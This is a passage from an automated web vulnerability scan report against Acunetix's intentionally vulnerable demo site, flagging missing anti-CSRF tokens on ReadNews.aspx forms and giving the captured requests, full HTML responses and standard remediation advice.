          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        19. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          No Anti-CSRF tokens were found in an HTML submission form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Content-Length: 6543
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6543 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 22723
          
          
          Response body (22723 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur, or that provides constructs that make it easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        20. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          No anti-CSRF token was found in the submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (414 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Content-Length: 10975
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10975 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 30429
          
          
          Response body (30429 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
